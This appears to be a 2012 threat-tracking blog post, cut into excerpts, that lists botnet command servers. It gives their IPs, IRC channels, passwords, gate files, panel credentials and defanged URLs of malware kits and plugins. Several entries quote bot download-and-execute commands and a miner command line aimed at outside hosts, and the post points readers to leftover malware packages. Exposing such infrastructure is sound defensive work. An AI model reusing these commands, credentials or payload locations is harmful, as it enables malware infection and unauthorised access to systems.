Resolved : [dns.domain-crawlers.com] To [212.48.121.103] bitcoin-miner.exe -a 60 -l no -o hxxp://dns.domain-crawlers.com:8332/ -u haqidodges@gmail.com -p password the guy using this shit is a real hecker he uses gmail lol sample bitcoin-miner hosting infos: http://whois.domaintools.com/212.48.121.103
aminakoyim.co.cc (ngr irc botnet hosted by Sweden Stockholm Portlane Networks Ab)
Resolved aminakoyim.co.cc to 46.246.93.77 Server: aminakoyim.co.cc Port: 6667 Password: timu Channel: #NGR * Topic for #NGR is: !vs www.pvpserver.gen.tr 1 | !dl hxxp://www.depac.ws/jar/h.exe * Topic for #NGR set by infeCTeD at Sun Nov 04 13:32:54 2012 All users are auto joined to #debug# on connect * Topic for #debug# is: !dl hxxp://www.depac.ws/jar/t.exe c:/t.exe 1 *Read more...
cdn.barracudasec.com (Barracuda http bot hosted by Seychelles Victoria Business Dialogue Ltd)
Resolved cdn.barracudasec.com to 91.217.178.192 Server: cdn.barracudasec.com Gate file: /bot.php http://cdn.barracudasec.com/images/logo.png Bot Get requests look like this: /bot.php?ip=0.0.0.0&os=Microsoft Windows xp&name=FBI-PC&id=Federal agent-barracuda version Bots will get ip from checkip.dyndns.com or api.wipmania.com Hint: $ip= $REMOTE_ADDR Hosting infos: http://whois.domaintools.com/91.217.178.192 Another panel is located at xn--y0h.co.cc. This one is on a different host. http://xn--y0h.co.cc/images/logo.png Hosting infos: http://whois.domaintools.com/37.0.124.66
diablothreecracked.in (Smokeloader hosted by Luxembourg Luxembourg Root Sa)
Resolved diablothreecracked.in to 94.242.199.145 Zain got himself a new smokeloader. Server: diablothreecracked.in Gate file: /index.php He left the zip containing the panel and original exe up on the host: hxxp://diablothreecracked.in/smoke.zip Here it is if he notices and takes it down hxxp://diablothreecracked.in/install.php is still up as well. Hosting infos: http://whois.domaintools.com/94.242.199.145
zqpoetyafw.org (Chebri bot hosted by Canada Affilnet Corporation)
Resolved zqpoetyafw.org to 108.63.14.21 Server: zqpoetyafw.org Port: 20001 Note: Not an irc. Don’t waste your time trying to connect. This is one of snk’s bots. It’s being loaded from his irc. * Topic for #load is: !j -c RU,RUS #r2 !j #xtp !dl hxxp://hotfile.com/dl/178567859/27b7e85/41aa2c2d8.html * Topic for #load set by lol at Mon Nov 05Read more...
5.231.22.188(Athena bot hosted in Germany Bad Homburg Vor Der Hohe Ghostnet Network Used For Vps Hosting Services)
Sample comes from djmetral thnx to him Server: 5.231.22.188:6667 Nickname: [A|W_XP|2]cznug Username: 18129 Channel: (Password: ) executable is binded with other bot in same server Nick: hAtbLaDe”; Username: 27867 Channel: #Support”; Channel: #Lobby,#IRCd”; Channel: #l34k Channel: #IRCd,#Support,#main with Password letmein,somepass,anotherpass”; Private Message to User VHOST”;: “VHOST”;” #army is the channel for ddos bots(pBots) here theRead more...
rtu.jgieo445.in(irc bot hosted in United States London Santrex Internet Services Ltd.)
server rtu.jgieo445.in PASS 0 port 4707 channel:#botnet (thnx to anonymous guy for finding the channel) NICK [A|W_XP|x32|D]tilcbb USER 23637 8 * :23637 Local users: Current Local Users: 53 Max: 517 Global users: Current Global Users: 53 Max: 517 i dont have the exe to find channels feel free to discover them hosting infos:Read more...
mirror.serverhalflife.com (Pandora http bot hosted by Netherlands Haarlem Leaseweb B.v.)
Resolved mirror.serverhalflife.com to 95.211.209.178 Pandora ddos bot Server: mirror.serverhalflife.com Gate file: /pando/?u=17b6n82405v5ycal3ks4bb7i655e088m Other crap on the server Microworm panel: mirror.serverhalflife.com/micro/ The password is “root” Files are located at hxxp://mirror.serverhalflife.com/files/ blackdra.exe is blackshades Connects to own3d-private.no-ip.org:4010 Blackshades downloads more of the files x0x0.294.24.10.10.0.2.15.0.0.0.Federal-Agent.FBI-PC.1.Microsoft Windows XP .522.0.5.0.58802054.0.new.November 4, 2012.Hide My Ass Vpn FBI access panel (Welcome AgentRead more...
vvv.exp1oit.in (Andromeda http hosted by France Roubaix Ovh Sas)
Resolved vvv.exp1oit.in to 178.33.241.61 This is the new andromeda of the french guy. It is the full version with all of the plugins. Server: vvv.exp1oit.in Gate file: /google/image.php Plugins: Formgrabber: beautyoftheworld.ca/xs/f.pack Gate file: /google/fg.php Socks: beautyoftheworld.ca/xs/s.pack Rootkit: beautyoftheworld.ca/xs/r.pack Downloads files from hxxp://jamboproducciones.com/xs/ and hxxp://ez-cs.net/dk/ He also has a new smoke loader up Server: smk.cheatgame.org GateRead more...
ultimatecore.info (Andromeda http bot hosted by Ukraine Ukrainian Internet Names Center Ltd)
Resolved ultimatecore.info to 91.231.84.114 New andromeda from this guy. Server: ultimatecore.info Gate file: /mario/root.php This is the full version of andromeda, with all of the plugins. Plugins: Formgrabber plugin: ultimatecore.info/test/f.pack Gate file: /mario/fg.php Socks plugin: ultimatecore.info/test/s.pack Rootkit plugin: ultimatecore.info/test/r.pack Hosting infos: http://whois.domaintools.com/91.231.84.114 Edit: Plugins are now at ultimatecore.info/samuelkaptioalpha1/ I think you can guess what eachRead more...